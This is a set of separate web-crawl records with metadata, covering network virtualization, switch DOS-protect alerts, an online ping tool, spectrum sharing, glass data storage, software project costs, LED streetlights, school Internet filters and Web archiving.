usage of 802.1q VLAN tagging of all packets getting across from one switch to another. It further means that we can expand VLANs from one switch to another and use only one interconnection to do that. Without trunk, every VLAN that needs to be expanded to another switch would need a separate interconnection with access ports dedicated to that VLAN on both sides. Multi-hop interconnection virtualization can be done with GRE tunnel. In this case we can build a tunnel from one edge device, across the network of hundreds of nodes, to another edge device. They will logically seem to be directly connected across this GRE tunnel. GRE tunnel in this case is an isolated path for those two devices to use exclusively. When looking at hardware, the thing is.. Networking devices are forwarding traffic with specialized chipset (ASIC network processor) which cannot be simulated with software (at least not good enough). Virtualization is enabled by software but also uses advance hardware chipset capability to be accessed and controlled directly from virtual context. In this case, hardware chipset needs to be aware of how to work with virtualization layer to make this possible. This is why virtualization is not actually powered only by software but with combination of hardware and software. In server virtualization, the so-called hypervisor world, processor (CPU) have advanced virtualization technologies called Intel “VT-x” for Intel and “AMD-V” for AMD. They are enabling the Virtual Machines running on hypervisor to access CPU directly in some cases thus accelerating the Virtual Machine operation. In the networking world, related to hardware, we have so called DPDK firstly supported on Inter x86 processor. It is a driver, or driver set, which enables fast packet processing in CPU effectively enabling networking operation on standard server faster. Open vSwitch from Nicira/VMWare is doing something with smart algorithm and part with DPDK to get even better performance of packet switching from one interface to another using standard server processors. Standard server processors are in focus as they enable us to run networking devices without specialized hardware appliance from networking vendor. In this case we just install additional software on standard server making appliance out of it or deploying a Virtual Machine on a hypervisor which supports DPDK or some kind of acceleration for packet manipulation. In this way we get more flexibility, less power consumption and better overall resource usability with same or less in price. At this time, specialized networking appliances are still needed for high-end network devices which need cutting edge performance but more and more devices like firewalls and smaller datacenter routers are pushed into virtual environment. Read the whole series about Path Isolation techniques:
<urn:uuid:8c45ff52-3ed6-4db0-b274-f052208ea9ba>
CC-MAIN-2017-09
https://howdoesinternetwork.com/2016/network-virtualization
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171706.94/warc/CC-MAIN-20170219104611-00635-ip-10-171-10-108.ec2.internal.warc.gz
en
0.916377
1,186
3.375
3
If DOS-protect is enabled, the switch monitors the amount of packets per second that are being forwarded by the CPU. Once the number of packets forwarded by the CPU reaches the configured Notify-threshold it will log a message. This message does NOT indicate where this traffic originates from. Most traffic should NOT be forwarded by the CPU. Normally the CPU is only utilized for processing - control traffic such as ARP packets (e.g., ARP requests) and routing protocols control packets (e.g., OSPF hellos) - management traffic such as telnet, SNMP, or SSH destined to the switch - broadcast packets, some multicast and all unknown unicast packets As long as the switch has an entry in its hardware tables for the destination (entries such as FDB entry, ARP entry, IGMP entry or a route), traffic will NOT be handled by the CPU. When a new entry is learned, the CPU will program the the switche's hardware tables and the CPU forwarding will stop. CPU forwarding is sometimes referred to as slowpath forwarding. In some cases the CPU forwarding continues. This is an undesirable state and could be happening due to (among many other causes) an attack on the switch, some misconfigured devices in the network or an intrusive network testing tool. DOS-protect can be configured on the switch to detect this misbehavior. Making a capture of packets to the CPU with debug packet would be the only method in this case to troubleshoot what is going to the CPU.How to perform a local packet capture on an EXOS switch DOS protect has 2 thresholds. What is discussed above is Notify-threshold. The other threshold is the Alert-threshold. If the Alert-threshold is reached DOS-protect will install an ACL to block the CPU forwarded packets, it will try to find a match for most of the traffic and install the ACL. This is only done when DOS-protect is enabled (it is enabled by default). You can also enable DOS-protect in simulated mode, it will then only log which ACL it would install if DOS-protect was actually enabled but will not install the ACL. This way you can get an idea of the traffic forwarded by the CPU and resolve it.
<urn:uuid:7472a2aa-19b5-488d-a46d-ade62c67c9eb>
CC-MAIN-2017-09
https://gtacknowledge.extremenetworks.com/articles/Q_A/DOS-protect-log-message
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174276.22/warc/CC-MAIN-20170219104614-00511-ip-10-171-10-108.ec2.internal.warc.gz
en
0.935537
470
2.84375
3
ping test is used to determine the connectivity and latency of Internet connected hosts. The online Ping Test uses the nping tool from the Nmap project. TTL in the Ping Response Here is a bit of useful information that you can impress your friends with... in a Ping response there is a TTL or Time to Live value. These come from the system that you are sending your ICMP request packets to and can be used to perform a limited operating system detection check. The starting TTL varies depending on the operating system. Generally Linux, Windows and Cisco routers have differing values. Of course there are many other possible values and devices, however this can be a quick way to determine what the device is that is responding to your Ping request. This can mean that gateway or NAT devices such as firewalls and routers may be the one responding to the Ping. For example; you could ping a Microsoft IIS web server, however if there is a firewall or load balancer in front of it with a *nix based operating system you will receive a TTL of 64 rather than the expected 128. Your actual result will be lower than the listed value as the TTL will decrement on each hop along the path. Common Operating System TTL - 64 Linux or *nix based operating system - 128 Microsoft Windows (from Windows XP onwards) - 254 Cisco Network Router About the Test Ping Tool Ping is a network troubleshooting tool that displays the response time between two Internet (or IP) addresses. Ping tools are installed by default in most operating systems. It does not matter if you are using Solaris, Windows, FreeBSD or Ubuntu Linux; ping is ubiquitous. A ping uses a type of packet known as ICMP, commonly known as ICMP request and ICMP reply. No response from Ping Firewalls and routers can be configured to block ICMP request and response so you will sometimes find a system does not respond to ping even though the system is up and running. Network Firewalls, such as commercial Cisco and Checkpoint products can do this as can local firewalls such as your local Windows Firewall or a local Linux firewall using IP Tables. What methods are used to determine the response?Ubuntu Linux Tool The default ping tool that comes with Ubuntu Linux is used, and the results are parsed and displayed in the table. Number of ICMP Packets Five packets are sent from our server in Newark (USA), and our system will then determine how long it takes to get a response from your selected Target IP address. Is this dangerous? Ping is a very common tool that is used everywhere, there is nothing dangerous about an ICMP packet; so you are free to try and ping different systems to determine if they are running and how far away they are from our system. Note that it is possible to use ICMP for a denial of service attack; however this requires sending many more packets than the 5 that the tool here does. Need even faster access to the online Ping tool than the form above? Try our easy to use API you are limited to a simple 50 lookups a day and there is no API key required. It is pretty straight forward, use a web client of some kind such as curl, firefox, python or php and hit that address, you will see the Ping results as a simple text response to your HTTP query. Of course change the 188.8.131.52 that is the Google public DNS server to an IP or hostname of your chosing.
<urn:uuid:760fb615-f3fe-4f72-bb8e-91433157494a>
CC-MAIN-2017-09
https://hackertarget.com/test-ping/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170249.75/warc/CC-MAIN-20170219104610-00103-ip-10-171-10-108.ec2.internal.warc.gz
en
0.927089
722
3.09375
3
The U.S. military might have to share its radar frequencies with mobile broadband providers under a plan the Federal Communications Commission continued to flesh out this week under the catchy name Citizens Broadband Radio Service. CBRS isn't exactly a broadband version of Citizens Band radio -- which still exists, at astonishingly low frequencies around 27MHz -- but the FCC's description of what it might be used for suggests a broad range of options. They include licensed carrier cells, fixed wireless broadband, advanced home networking and other uses, the agency said. It's seeking public comment on the proposals. + Also on NetworkWorld: Here's how Apple is spending $1B on Sapphire for its iPhones, iPads and more + The proposed rules could allow sharing a wide band of spectrum spanning 3550MHz to 3700MHz. Parts of that spectrum are home to high-powered military radar, especially within 200 miles of U.S. coastlines, which is also home to a majority of the country's population. To prevent interference, the FCC calls for using a dynamic database to keep track of where and when the frequencies can be used. Network equipment can tap into such databases to find out whether a certain frequency is being used in a given area. Though the concept of spectrum sharing with a database is similar to the so-called "white spaces" that are open to unlicensed use around TV channels, the CBRS band would be a bit different. It would have three classes of users. Federal and non-federal incumbent users would be first, protected from interference from the new services. Next would be "targeted priority access," including licensees offering mobile broadband. Finally, "general authorized access" users would be permitted "in a reserved amount of spectrum and on an opportunistic basis," the agency said. That could include both consumer and business uses. Mobile operators and some lawmakers have opposed spectrum sharing, saying exclusive, commercial spectrum licenses better serve consumers. But the President's Council of Advisors on Science and Technology recommended in 2012 that the government find ways to share as much as 1.5GHz of spectrum. It identified the 3.5GHz band as the best target for early sharing. The 3.5GHz band is higher than the frequencies typically used for mobile broadband, making it better suited to so-called small cells, miniature base stations designed to serve tightly packed urban users over short distances. Technology advances in small cells and in spectrum-sharing systems will help to make CBRS feasible, the FCC said.
<urn:uuid:b35b0024-2033-4dea-af34-68d81c191210>
CC-MAIN-2017-09
http://www.networkworld.com/article/2176385/smb/us-wireless-users-may-get-to-share-military-spectrum.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170253.67/warc/CC-MAIN-20170219104610-00451-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948302
508
2.5625
3
Researchers have been able to demonstrate the ability to read and write data using a five-dimensional recording process in a synthetic crystal to store massive amounts of data indefinitely. The researchers, led by Jingyu Zhang from the University of Southampton in the U.K., successfully recorded a 300KB digital copy of a text file onto nanostructured glass in 5D using ultrafast and intense pulse laser. The file was written in three layers of nanostructured dots separated by five micrometers (five millionths of a meter). The scientists used a femtosecond laser, which emits pulses of light in femtoseconds (one quadrillionth, or one millionth of one billionth of a second). The 5D read/write laser can record up to an estimated 360 TB/disc data capacity on nanostructured glass capable of thermal stability up to 1000C -- and a practically unlimited lifetime. In a statement this week, the researchers called the glass the "Superman memory crystal," alluding to the "memory crystals" used in Superman films to store the planet Kryptonite's history and its civilization's collective knowledge. The University of Southampton researchers recorded via self-assembled nanostructures created in fused quartz, which they said is able to store the vast quantities of data for more than a million years. The information encoding comes in five dimensions that include the size and orientation in addition to the three dimensional position of these nanostructures. According to a recently published paper, the self-assembled nanostructures change the way light travels through glass, modifying polarization of light that can then be read by combination of optical microscope and a polarizer, similar to that found in Polaroid sunglasses. A graphic depicting a 5D optical storage writing setup: femtosecond laser, spatial light modulator (SLM), Fourier lens (FL), half-wave plates matrix (/2 M), dichroic mirror, 1.2 NA water immersion objective, silica glass sample, translation stage. (Image: University of Southhampton) The research was conducted as part of a joint project with Eindhoven University of Technology. "We are developing a very stable and safe form of portable memory using glass, which could be highly useful for organizations with big archives," Jingyu said in a statement. "At the moment, companies have to back up their archives every five to 10 years because hard-drive memory has a relatively short lifespan. "Museums who want to preserve information or places like the national archives where they have huge numbers of documents, would really benefit," he added. This article, 'Superman' crystals could store 360TB of data forever, was originally published at Computerworld.com. Lucas Mearian covers storage, disaster recovery and business continuity, financial services infrastructure and health care IT for Computerworld. Follow Lucas on Twitter at @lucasmearian or subscribe to Lucas's RSS feed. His e-mail address is [email protected]. Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
<urn:uuid:3a07719f-8a96-41f7-917b-34fd4f20565b>
CC-MAIN-2017-09
http://www.computerworld.com.au/article/520788/_superman_crystals_could_store_360tb_data_forever/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171608.86/warc/CC-MAIN-20170219104611-00503-ip-10-171-10-108.ec2.internal.warc.gz
en
0.924184
640
3.125
3
This article uses economic criteria to define what it means for a project to fail. It then categorizes how projects fail and finally, it examines common traps that contribute or accelerate project failure. The cost, feature, product spiral Economics of Adding Features Organizations must consider the cost of adding features to a product. Figure 1 shows a software project whose returns outpace the cost of production, thus producing a positive ROI. Figure 2 depicts a product that initially has a positive ROI, but whose added features cost (marginal cost) more than the amount of return generated by the features. This initially profitable product becomes a drag on the company. Figures 1 and 2 are deceptive because under most software processes, the cost of changing software is not linear, but exponential. Brooks (1) attributes the exponential rise in costs to the cost of communication. Changes to software include new features, bug fixes and scaling. The effects of exponential cost of production can be characterized by three properties. First, new projects are successful because the cost curve is flat. Second, once the costs start increasing, they quickly overcome any additional value added from the new features. Finally, if changes are made after the costs become exponential, the additional costs will quickly overwhelm all returns garnered from the product to date. Figure 3 details the effects of an exponential cost of change. Software processes are designed to manage the cost of change. An examination of cost management and processes is beyond the scope this article but will be the topic of a future article. Briefly, processes that follow waterfall and iterative models control costs by reducing need for change as costs increase. In contrast, processes based on the spiral model ensure that the cost of change is fixed. This article assumes an exponential cost of change as most projects are based on waterfall or iterative models. Changes are often unavoidable because there are no successful medium-sized software projects. Successful projects require a significant amount of development and become a company asset. Maximizing ROI means expanding the market and the addition of features which, in turn, increase the investment in the product. If the next version is successful, this increased investment leads to an even greater desire to maximize returns. If the cost of change becomes exponential, high cost makes adding features impractical and development must stop. Unfortunately, most companies do not realize this point exists and spend huge sums on dead products. Software Failure Modes Exponential costs of change belie a stark reality: Unless the product is shipped before the cost of change becomes exponential, it will very likely fail. Many projects become races to see if enough features can be created to make a viable product before adding the additional required features becomes too expensive. There are four failure modes that prevent product completion: Hitting the wall before release: A small team of programmers is making good progress adding features to a product. Before the needed features can be delivered, some event makes the cost of change exponential and all progress stops. These events may include losing a key team member, adding team members to accelerate production, unforeseen difficulties with technology choices, unforeseen requirements, and major changes in target audience/market. Figure 4 shows how the minimum number of features will never be reached. 90% done: A team of programmers is making steady progress but never finishes the required features because of a gradual rise in the cost of change. This failure mode is often unavoidable because the riskiest features are often put off until last. These features often require so much complexity that their solutions overwhelm the development process. Proper risk mitigation is essential to avoiding this failure mode. Endless QA: Endless QA occurs when a product ships with all features completed, but still has too many bugs to make it into production. If the cost curve has become exponential, these bugs will take longer and longer to fix. As the cost of change increases, any given change will likely cause more bugs. Figure 6 demonstrates how the fixing of bugs once the product is released to QA can ruin ROI. The higher the cost of change before delivery to QA, the larger the number of bugs. Indeed, the number of bugs at QA is a good indirect metric of the cost of change. Version 2.0: Most failures of version 2.0 of any product can be traced to exponential cost of change. During version 1.x, the cost of change has become exponential. The new features will never generate high-enough returns to make up for the costs of producing the version. Figure 7 diagrams this effect. What is most frustrating for many teams is that after a successful first version, the costs of change may have become so high, that it is unlikely the second version will ever ship. If costs do increase exponentially, development teams must ensure cost is managed until delivery of the product. If they don't, failure is all but guaranteed. Unfortunately, there are several traps for developers that accelerate the onset of exponential costs of change. Interestingly, all of these techniques are designed to accelerate development at the beginning of the project, but the costs of using may overwhelms any savings. Here are four of the most common traps: Prototype trap. Product prototypes are great ways to prove technologies, techniques and reduce risk. However, unless the economics of development are understood, they become liabilities. The problem is how much money is spent on the prototype. If enough resources are spent on any given prototype it becomes too valuable to throw away. Most developers intend to throw away a prototype once it is completed and the resulting code quickly becomes expensive to change. The prototype trap can be avoided by ensuring that no significant investment is spent on any given prototype. There are many situations where prototypes are necessary, but they must never endanger a project by reducing the amount of resources available to finish. 4GL trap. 4GLs such as Visual Basic (VB), Forte, 4GL, and Magic allow developers to rapidly develop applications by making assumptions about how data will be accessed and displayed. The problem with 4GLs is that the code is very hard to modify after it has been created. This accelerates the cost of change. In addition, a language that makes some applications easy to create becomes a hindrance when the problem domain exceeds the design of that language. Often, the only way around these limitations is to use some other language such as Java or C++ to solve the unsupported problem. The interfaces between multiple languages are notoriously expensive to maintain and extend. Anyone who has tried to make a VB application perform and look like a professional, highly polished standalone application will immediately realize these limitations. The 4GL trap is easily avoided by understanding the limitations of each language and only using it if all of the features required by the product fit within the assumed model of the language. This is the most insidious part of this trap. Most 4GLs are marketed as being designed for novice programmers with little training. Microsoft has been particularly aggressive in marketing VB to companies as the way to hire 'cheap' programmers. Unfortunately, these are precisely the people who should not be making the decision about when a particular language is adequate for solving a given problem. Choosing the wrong language will ensure that the product will never ship. Scripting trap. Scripting languages allow the easy creation of sophisticated software by sewing together existing applications. Advanced scripting languages such as Perl are very powerful and can be used for a variety of purposes. Operating systems such as Unix are designed to be easily integrated through scripting languages and have far lower cost of ownership than those whose management tools are grafted on with pretty user interfaces. The trap lies in the sophistication of these languages and the mechanisms that make it easy to write programs. Most scripts are not maintainable or even readable by those people who created them. This does not mean that scripts are bad things. They are the perfect solution for integrating existing tools and making small programs. However, since they are always expensive to maintain, the amount of effort put into any single script should be below the threshold of throwaway code: essentially, it is usually cheaper to rewrite the script than to try to modify it. A stark example of the scripting trap comes from Excite. Excite built its original search and Web serving infrastructure in Perl on Unix machines. Perl allowed Excite to quickly create products that competed with more mature companies such as Yahoo and Web Crawler. However, by 1998, maintenance expenses made it impossible to add new features. Excite had to stop all production and rewrite its infrastructure in Java. This transition took many months and hindered Excite's competion in the other markets such as online shopping and video streaming. Avoiding the trap is relatively easy. There are many applications that are small and will remain small forever. These are perfect for scripting languages. If new features are required, this small size makes it easy to rewrite in an OO language to control cost of change. Integrated Development Environment (IDE) trap. Many companies product IDEs that allow developers to quickly deploy code that they write. Examples include Microsoft's Visual Interdev Studio and .NET framework, IBM's Visual Age and Oracle's 8i. The problem with these environments is that they make assumptions about the target deployment environment and workgroup configuration. The problem is that companies do not design these tools to help developers, but lock developers who use their IDE's into their platforms. In the real world of changing requirements, platform restrictions are often deadly. These restrictions include limited OS support, limited APIs that may make certain features impossible, or platform bugs. Often, the only way around these restrictions is to rewrite major amounts of code. The IDE trap is easily avoided by choosing tools that do not lock you into a vendor's technology. In addition, development teams must deploy to production style systems early in the development process. This allows adequate time to develop the necessary scripts and procedures to ensure proper delivery. Reengineering trap. Reengineering projects is designed to address exponential cost of change of an existing system. Lessons learned in previous versions can be applied to control the cost of change. Reengineering almost always fails because the existing code cannot be easily changed because the cost of change is exponential. If the cost of change was not exponential, there would be no reason to reengineer. This makes it extremely expensive to work with the existing code. As a result, reengineering usually takes as long or longer to complete than the original product while producing the same set of features. If it took 10 man-years to complete the first product, it will probably take 10 man-years to complete the reengineered version with exactly the same features. Ten man-years for a zero-sum gain. This is why reengineering projects are rarely completed. The reengineering trap is avoided by developing a migration strategy. All new features must be made separate from the original code base to avoid the exponential cost of change and the original code base is mined for completed features. Whenever a bug is encountered in the original code base or an existing feature needs to be extended, the existing code is removed and refactored into the new code base. These migrations are expensive, but there is no way to avoid them. In this way, an organized reengineering of only those sections that are not currently adequate will be performed. The cost of changing these sections will be exponential, but will hopefully be limited. In a capitalist economic system, software must possess a positive ROI in order to make sense to an organization. Many software products fail not because there is no market, but because the cost of creating the software far outstrips any profit. Exponential costs of change exacerbate this problem. Software processes are designed to manage these costs; however, it is crucial that an organization understand how and when the costs of creating software will outstrip the worth of a product. Fortunately, software products tend to fail in one of four modes. By understanding how these modes organizations can choose the appropriate software process to avoid these failures. Each software process model (waterfall, iterative, spiral) has a different approach of managing costs. How each process attempts to manage costs is beyond the scope of this article. However, understanding how costs contribute to failures is crucial to picking a model and process appropriate for your organization. Finally, regardless of the chosen software process, there are several traps that can accelerate the exponential cost of software production and must be avoided at all costs. The tools that cause these traps are essential to the existence of any software organization, but inappropriate selection will invariably lead to failure. Fortunately, it is usually possible to avoid these traps. Carmine Mangione has been teaching Agile Methodologies and Extreme Programming (XP) to Fortune 500 companies for the past two years. He has developed materials to show teams how to move from standard methodologies and non-object oriented programming to Extreme Programming and Object Oriented Analysis and Programming. He is currently CTO of X-Spaces, Inc. where he has created an XP team and delivered a peer-to-peer based communications infrastructure. Mangione is also a professor at Seattle University, where he teaches graduate-level courses in Relational Databases, Object Oriented Design, UI Design, Parallel and Distributed Computing, and Advanced Java Programming. He holds a B.S. in Aerospace Engineering from Cal Poly Institute and earned his M.S. in Computer Science from UC Irvine. The Mythical Man Month, Brooks, F.P., Addison-Wesley, 1995.
<urn:uuid:0c1e5c07-0f2d-4eb9-8d6c-d10ca2ab63f7>
CC-MAIN-2017-09
http://www.cioupdate.com/reports/article.php/1563701/Software-Project-Failure-The-Reasons-The-Costs.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170380.12/warc/CC-MAIN-20170219104610-00147-ip-10-171-10-108.ec2.internal.warc.gz
en
0.948061
2,736
3.09375
3
State and local governments looking to improve efficiency and cut costs are casting their gaze skyward -- at streetlights -- for an answer. Some cities are modernizing their streetlights with light-emitting diodes (LEDs), others link them to centralized control systems and some do a combination of both. Replacing the high-pressure sodium (HPS) bulbs commonly used in streetlights with LEDs is a simple solution that can yield big benefits. According to a report from the Rensselaer Polytechnic Institute, Transcending the Replacement Paradigm of Solid-State Lighting, by Jong Kyu Kim and E. Fred Schubert, "Deployed on a large scale, LEDs have the potential to tremendously reduce pollution, save energy, save financial resources, and add new and unprecedented functionalities to photonic devices." Another strategy used by some municipalities is implementing a centralized control system that alerts officials when a light goes out. Previously a city worker or resident had to see a malfunctioning light and report it. A centralized system allows manpower to be used more efficiently and helps track energy consumption. Anchorage, Alaska, is lighting up the northern sky as the city works toward converting all its 16,500 streetlights to LEDs. According to Michael Barber, the city's lighting program manager, Anchorage purchased 4,300 LEDS in August 2008 for $2.2 million. He said energy efficiency and cost savings drove the initiative. So far, 1,200 lights have been installed, and Barber said the remaining 3,100 of them would likely be set up by May 2009. One of LEDs' main benefits -- besides using 50 percent less energy than traditional bulbs -- is that they can be connected to a centralized control system, which Anchorage has done. "Either over the power line or radio frequency, we' have a light that's communicating with a server and telling it, 'I'm burning at this temperature,' or, 'For some reason, I'm sucking up way more energy than I should,'" Barber said. The system lets the city know in real time when a light should be replaced or needs warranty support. That's important because LED bulbs are significantly more expensive. In the past, when HPS streetlight bulb failed within the warranty period, Barber said the city would forgo the warranty and just replace it because those bulbs are cheap -- only $10 each. LEDs, however, cost $500 to $1,000 apiece, so it's important to have accurate information. When and LED it loses 30 percent of its initial luminosity, it's considered to have failed. "With control systems we can have the light tell us when there's a warranty issue or if the light goes out," he said. "We'll see a surge and a change in the energy consumption on that circuit." Another benefit of the centralized system is increased efficiency through the use of controls, which leads to more energy and money saved. LEDs have dimmable ballasts that allow officials to change the light's brightness, which is a big advantage over HPS bulbs. Barber said the city is planning to dim the streetlights in residential neighborhoods between 10 p.m. and 5 a.m. by 40 to 50 percent. He hoped that by May 2009, the city's next round of budgets would be completed and there would be funding to continue retrofitting the remaining 12,200 streetlights. "We estimate that when we do the whole city, it will be within $1.5 [million] and $1.7 million a year in savings," Barber said. "We don't know what that would mean if we also implemented controls over the whole city, but it wouldn't be shocking to see 70 percent efficiency over the [HPS]." Centralized control systems are also benefiting cities that haven't converted to LED streetlights. About five years ago, Los Angeles began testing a remote-monitoring system on 5,000 of its more than 209,000 streetlights, according to Norma Isahakian, assistant director of the city's Bureau of Street Lighting. "I think the main benefit up to this point has been reporting on when the lights are out," Isahakian said. "We want to make sure the majority of lights are on, not just for the fact that we want the lights on, but there are also liability reasons." The city is attaching external computer boxes to its streetlights. Isahakian said the external units work best because Los Angeles uses more than one streetlight manufacturer. There's the cost of an external unit for each light and the base computer unit that information is transmitted to. "They use radio waves to get the information back to the main unit, and the main unit uses a cellular system to get it back to the main office," she explained. She said the project was initially launched in a convenient location where city-employed field workers were close enough to physically see the lights, which they then tracked online. The computer boxes are now installed on new streetlights in construction areas and on those that are replaced. Better workflow has been another improvement. "A lot of times when we go out to the unit, we know what's going wrong with it," Isahakian said. "Instead of making multiple trips, we'll make only one trip because we'll know the unit just needs to be changed." Los Angeles is also beginning to pilot the use of LED streetlights. According to the city's LED Street Lighting Energy Efficiency Program, the first phase involved retrofitting 100 streetlights between November 2008 and January 2009. According to a document from the program, "Based on preliminary analysis and evaluation of the development of the LED industry, the bureau is strongly considering a large-scale project to replace existing roadway fixtures into LED or any other high-efficiency light source." Isahakian said the bureau has been researching LEDs for the last couple of years, but only recently did the lights begin performing up to the standard it was looking for. "I think the remote-monitoring system and the LED fixtures together are really going to make more sense," she said, "because you're able to do more things with them, like dim the streetlights."
<urn:uuid:b8e32b9c-4375-4ff8-97d2-23c47a6cee2d>
CC-MAIN-2017-09
http://www.govtech.com/featured/Light-Emitting-Diode-Streetlight-Systems-Help.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170651.78/warc/CC-MAIN-20170219104610-00323-ip-10-171-10-108.ec2.internal.warc.gz
en
0.964316
1,266
3.0625
3
During this year’s State of the Union address, President Obama championed the goal of increasing bandwidth in schools across the country. The following day, a group of CEOs wrote an open letter encouraging the chairman of the FCC to “act boldly to modernize the E-rate program to provide the capital needed to upgrade our K-12 broadband connectivity and Wi-Fi infrastructure.” These calls to action were answered with pledges from business leaders amounting to $750 million dollars, an influx of money that should help provide more enriching learning environments for students across the country. As schools begin to plan for the benefits of improved connectivity, it is important to consider the responsibility of giving students guidance in becoming productive citizens of the web. New curricula must acknowledge the many-headed hydra that is social media: Its forms range from the mundane distraction to be overcome to the 21st century communication skill to be mastered. Integration of conscious social media use as well as policies that provide more free and unfiltered Internet access are two ways of modeling best practices and actively teaching Internet skills within schools. Especially as mobile devices enter the classrooms, students are exposed to the full range of what is available on the Internet. So it should be in the domain of schools more than ever to help students manage these capabilities. In an article called “Driven to distraction: How to help wired students learn to focus,” psychologist Larry Rosen finds in his research that students who are constantly distracted by social media do far worse academically than their peers who exercise less impulse control about their use of technology. Even with these findings, Rosen does not insist that technology be kept out of the classroom—in fact, he recommends allowing this part of kids lives into the classroom through managed “technology breaks.” Rosen argues that students must learn how to function alongside distraction and that school is a good forum for students to actively practice this sort of metacognition. In an article on boredom and Twitter in schools, Amanda Ripley suggests that students who are bored fall into two groups: the “reappraisers,” or students who teach themselves to see the value in a boring task, and the “evaders,” or those who search for distraction from boredom in technology. Unsurprisingly, the former have much more success academically than the latter. It is important that students not be conditioned to think of social media only as an escape to drown out other necessary tasks, but as something that might be integrated thoughtfully into life. This sort of skill is not just important in school. Even on the job, the most valuable employees will be those who know how to balance focused work and social interaction even when both collide on the device in front of them. Even with the new push for universal broadband in schools, though, there’s a barrier to teaching children these valuable lessons: widespread use of Internet filters in schools. The federal Children’s Internet Protection Act mandates that libraries and schools (especially those receiving internet subsidy through the government's E-rate program). Although in many cases adults can disable filters, the process is often complicated and cannot be done easily for a class of students working on an assignment that requires access to blogging platforms or other social media. In blocking harmful content, commonly used software like Websense and AutoExec Admin limits access to much important social media because of the difficulty of filtering explicit content from user generated material. Supervision of computer use is far better for educational purposes than simply shutting down rich and useful websites completely. Karen Cator, director of the education technology at the United States Department of Education says about Internet filters in schools, “What we have had is what I consider brute-force technologies that shut down wide swaths of the Internet, like all of YouTube, for example. Or they may shut down anything that has anything to do with social media, or anything that is a game. These broad filters aren’t actually very helpful, because we need much more nuanced filtering.” The tension between the educational goal of teaching students to use the web well and the reality of Internet filters is evident in a recent document from the New York City Department of Education. This past fall, it released a guide to social media use for students. The outlook is sunny. The obvious message is that social media is an important life skill for the 21st century, applicable to future jobs. The guidelines state their purpose as three-fold: to give “recommendations about healthy social media communications” and “ideas about how to create a smart digital footprint,” as well as to advise on what to doin cases of inappropriate behavior and cyber-bullying. But the document steers clear of any promises about what schools will teach—it rests at suggestion. In fact, the section about creating a digital footprint culminates in a reminder that “Families can be helpful partners” and that students should “Share your digital footprint with your parents and consider their suggestions.” By passing responsibility on to parents, this document acknowledges that many of the city's classrooms fall victim to just the sort of “brute-force technologies” that Cator speaks against. Before schools can take an active role in teaching social media use, responsibility, and self discipline, students and teachers need legitimate access to such platforms in the classroom must be clarified and legitimized by modernizing web filters. The intentions of using Internet filters in schools are good of course, but they were created in times when it was still possible to shield students from the the dangers of the unknown. Better now is to take needed steps toward educating students about how to live responsibly and productively on the Internet. As the recent failed rollout of iPads in Los Angeles has shown, students excel at breaking through filters and accessing whatever they want through proxy servers. It is counterintuitive to move forward with new technology in schools while still holding on to older models of the division between what is potentially harmful and what holds educational value.
<urn:uuid:6be2ea4c-8dc8-4608-98a5-12d59e543ade>
CC-MAIN-2017-09
http://www.nextgov.com/emerging-tech/2014/02/schools-should-be-teaching-kids-how-use-internet-well/78854/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172156.69/warc/CC-MAIN-20170219104612-00551-ip-10-171-10-108.ec2.internal.warc.gz
en
0.961908
1,222
2.84375
3
Cloud computing isn’t shaped like—or used like—the traditional computing model of the past. Cloud architectures allow users to access virtual pools of IT resources—from compute to network to storage—when they need them and, thus, achieve shared efficiency and agility. Made possible by the advent of sophisticated automation, provisioning, and virtualization technologies, the cloud computing model breaks the ties between the user’s application and the need to maintain physical servers and storage system on which it is run. Instead, users tap into aggregated resources as they need them. Cloud infrastructure can be provided as a public cloud (IT resources shared by multiple clients) or private cloud (IT resources, whether external or internal, controlled and managed by the IT organization). In this section, we will explore this dynamic new model of IT as a service and its impact on enterprises and the IT industry. SEEDING THE CLOUD: ENTERPRISES SET THEIR STRATEGIES FOR CLOUD COMPUTING Read what IT executives at leading U.S. companies are saying about cloud computing in a new EMC-sponsored study by Forbes Insights.
<urn:uuid:2d64bf32-9f3b-4bc6-bbc9-0d1dd8ee21e5>
CC-MAIN-2017-09
https://www.emc.com/leadership/articles/cloud-computing.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174135.70/warc/CC-MAIN-20170219104614-00075-ip-10-171-10-108.ec2.internal.warc.gz
en
0.912471
235
2.765625
3
"You own your own words," is one of the oldest online maxims. If only it were that simple. This adage comes from the pre-Internet explosion days, when computer bulletin board systems were how most people communicated online. It was coined by Stewart Brand, co-founder of online community The WELL, in an attempt to make users liable for their postings should libel disputes arise. But it has also been interpreted to mean nobody else but you should copy and reuse your words online unless you give permission to do so - even though Brand himself opposed this copyright interpretation of what he wrote in his early WELL members agreement. Though others also agreed with this broader interpretation, not everyone has. When you launch a Web site, post a blog or participate in Internet discussions, you may think your words will gradually fade away. If after posting online you had second thoughts and took it down, you might assume it's really gone. But chances are, it's all still up there. Internet archive systems exist, that in all likelihood, are preserving these things long-term. The best-known Web archive service is the Wayback Machine, part of a larger effort called the Internet Archive. This free service has taken snapshots of the Web at various points in time since 1996. An astonishing 85 billion pages are currently archived. Archiving is about redundancy, and the Wayback Machine's content is mirrored, appropriately enough, at the New Library of Alexandria in Egypt. The original Library of Alexandria, founded by the Greek rulers of Egypt around 300 B.C., was designed to be the world's knowledge repository. If you don't want your words preserved for posterity, the Wayback Machine lets you opt out. The service has instructions on how to remove previous versions of your site from its archive and also prevent it from making archives in the future. Another well known archive service is Google Groups - a Web interface to Usenet, the worldwide system of hundreds of thousands of online discussion groups. People can participate in discussions via the Web, e-mail program or a specialized Usenet program. Google Groups lets you search for and join specific discussion groups, as well as search for current and old posts about specific subject matter; archives go back to 1981. In the same manner as the Wayback Machine, Google Groups lets you remove previous posts from its archive and prevent it from archiving future posts but you must have a free account - preferably the same one used for the posts you want deleted. You can delete posts made with an old e-mail address you no longer have, but it's more cumbersome. Many other Web sites crawl the Web, Usenet, Yahoo Groups and similar places, and create 